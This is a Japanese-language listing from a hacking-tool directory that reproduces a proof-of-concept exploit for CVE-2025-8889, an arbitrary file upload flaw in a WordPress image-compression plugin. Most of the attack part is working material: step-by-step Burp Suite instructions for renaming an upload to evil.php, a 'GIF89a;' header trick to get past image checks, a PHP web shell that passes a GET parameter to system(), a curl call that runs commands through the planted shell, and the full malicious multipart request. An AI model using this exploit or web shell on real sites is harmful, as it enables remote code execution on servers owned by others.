Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8889 — CVE-2025-8889の概念実証エクスプロイト: WordPress Compress Then Uploadプラグイン1.0.3での任意ファイルアップロードからRCEへ。Burp Suiteを使用してMIME検証をバイパスし、PHPコードを実行するステップバイステップのPoCを含みます。 | Kitploit
ツール/GitHubGitHub/siberkampus/cve-2025-8889
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubsiberkampus/cve-2025-8889

CVE-2025-8889

CVE-2025-8889の概念実証エクスプロイト: WordPress Compress Then Uploadプラグイン1.0.3での任意ファイルアップロードからRCEへ。Burp Suiteを使用してMIME検証をバイパスし、PHPコードを実行するステップバイステップのPoCを含みます。

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイトタイトル: WordPress Compress Then Upload Plugin 1.0.3 任意ファイルアップロードによるRCE

日付: 2025-07-23
エクスプロイト作者: Muhammed Çelik
ベンダーホームページ: https://wordpress.com/plugins/compress-then-upload
ソフトウェアリンク: https://downloads.wordpress.org/plugin/compress-then-upload.latest-stable.zip
バージョン: 1.0.3
テスト環境: Debian、WordPress 6.8.1、Apache 2.4.62、PHP 8.2.28
CVE: CVE-2025-8889

脆弱性

「Compress Then Upload Images」WordPressプラグインは、メディアアップロードインターフェースを介した画像アップロード時に、ファイル拡張子とMIMEタイプを適切に検証しません。クライアント側の検証は存在しますが、アップロードリクエストを傍受して変更することでバイパスできます。

メディアアップロード権限を持つ認証済みユーザー(投稿者(Author)ロール以上)は、以下の方法でこの脆弱性を悪用できます:

  1. 最初に無害な画像ファイルをアップロードする
  2. アップロードリクエストを傍受する(例:Burp Suiteを使用)
  3. アップロードされたファイル名の拡張子とファイルの内容を変更して、悪意のあるPHPコードを含める
  4. 元のMIMEタイプヘッダー(image/jpeg)を維持して、脆弱なサーバー側チェックをバイパスする
  5. サーバー上で任意のPHPコード実行(リモートコード実行、RCE)につながる

PoC

ステップ1: 通常の画像ファイルを準備する
通常の画像ファイル(例:regular.jpg)を作成します(有効なJPGファイルであれば何でも可)。

ステップ2: WordPress管理パネルで通常の画像をアップロードする

  • 少なくとも投稿者(Author)権限を持つユーザーでWordPress管理パネルにログインします。
  • メディア > Compress Then Upload Images(プラグインのアップロードインターフェース)に移動します。
  • regular.jpg を通常どおりアップロードします。

ステップ3: Burp Suiteでアップロードリクエストを傍受して変更する

  • アップロードの進行中に、Burp SuiteでHTTPマルチパートリクエストを傍受します。
  • リクエストを変更します:
    • filename="regular.jpg" を filename="evil.php" に変更する
    • ファイルの内容をPHPウェブシェルコードに置き換える:
root@kitploit:~
GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }


注: `GIF89a;` は有効なGIFヘッダーを模倣して、脆弱な画像検証をバイパスします。
Content-Typeはimage/jpegのままにしてください。

変更したリクエストをサーバーに転送します。

ステップ4: アップロードしたWebシェルを実行する

アップロードが成功すると、PHPファイルはuploadsディレクトリに保存されます。例:
http://target-site.com/wp-content/uploads/2025/07/evil.php

ブラウザまたはcurlでアクセスします:

curl "http://target-site.com/wp-content/uploads/2025/07/evil.php?cmd=id"

悪意のあるアップロードリクエストの例(Burp Suite)

POST /index.php?rest_route=/wpctu-api/v1/upload HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
...
Content-Disposition: form-data; name="file"; filename="evil.php"
Content-Type: image/jpeg

GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>
?>
ツールをダウンロード